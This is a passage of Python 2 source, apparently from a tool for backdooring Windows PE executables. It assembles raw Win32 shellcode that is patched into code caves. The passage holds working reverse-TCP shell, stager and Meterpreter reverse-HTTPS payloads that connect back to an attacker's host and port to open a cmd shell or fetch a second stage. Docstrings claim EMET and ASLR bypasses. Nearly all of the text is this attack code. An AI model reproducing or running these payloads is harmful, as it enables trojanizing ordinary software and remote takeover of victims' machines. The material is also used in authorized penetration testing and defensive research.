len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(0xffffffff + breakupvar -
len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")),
16))
else:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(
abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print("Must provide port")
return False
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below to EBX
if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] +
flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack(
"<I", 0xffffffff +
(flItms['LoadLibraryA'] -
(flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack(
"<I", flItms['LoadLibraryA'] -
(flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD3" # add EBX + EDX
self.shellcode1 += "\xb9" # mov value below to ECX
if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] +
flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack(
"<I", 0xffffffff +
(flItms['GetProcAddress'] -
(flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack(
"<I", flItms['GetProcAddress'] -
(flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD1" # add ECX + EDX
self.shellcode1 += (
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A" "\x10\x52\x51\x87\xF9\xFF\xD5")
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
self.shellcode2 = (
"\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00")
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1,
self.shellcode2 + self.stackrestore)
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += ("\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def loadliba_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
#### BEGIN ASLR BYPASS ####
# This works because we know the original entry point of the application and
# where we are supposed to be as we control where our shellcode goes
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below ebx
if flItms['NewCodeCave'] is True:
if 'CodeCaveVirtualAddress' in flItms:
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", (flItms['CodeCaveVirtualAddress'] +
len(self.shellcode1) +
len(self.stackpreserve) +
flItms['buffer'] + 201
)
)
else:
self.shellcode += '\x00x\x00\x00\x00'
else:
if flItms['CavesPicked'] == {}:
self.shellcode1 += '\x00\x00\x00\x00'
else:
for section in flItms['Sections']:
if section[0] == flItms['CavesPicked'][0][0]:
VirtualLOCofSection = section[2]
diskLOCofSection = section[4]
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", int(flItms['CavesPicked'][0][1], 16) -
diskLOCofSection +
VirtualLOCofSection +
flItms['ImageBase'] +
len(self.shellcode1) +
len(self.stackpreserve) +
9)
self.shellcode1 += "\xe8\x00\x00\x00\x00"
self.shellcode1 += "\x5e" # pop esi
self.shellcode1 += "\x2b\xf3" # sub esi,ebx
self.shellcode1 += "\x83\xfe\x00" # cmp esi,0
self.shellcode1 += "\xbb" # mov value below to EBX
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'])
self.shellcode1 += "\xb9" # mov value below to ECX
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'])
# Don't jump if in ASLR env
self.shellcode1 += "\x74\x15" # JZ (XX) # Jump to location after ALSR check
#Find the base addr
#Base address difference now in ESI
self.shellcode1 += "\xb8" # mov eax, Normal imagebase
self.shellcode1 += struct.pack("<I", flItms['ImageBase'])
self.shellcode1 += "\x03\xc6" # add eax, esi # NOW YOU HAVE ASLR IMAGEBASE in EAX
self.shellcode1 += "\xbb" # mov ebx, the loadlibA offset
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryAOffset'])
self.shellcode1 += "\xb9" # mov ecx, the getprocaddr offset
self.shellcode1 += struct.pack("<I", flItms['GetProcAddressOffset'])
self.shellcode1 += "\x03\xd8" # add ebx, eax #EBX will hold LoadlibAoffset
self.shellcode1 += "\x01\xc1" # add ecx, eax #ECX will hold Getprocaddress
####END ASLR BYPASS####
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT) # PORT
self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
)
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
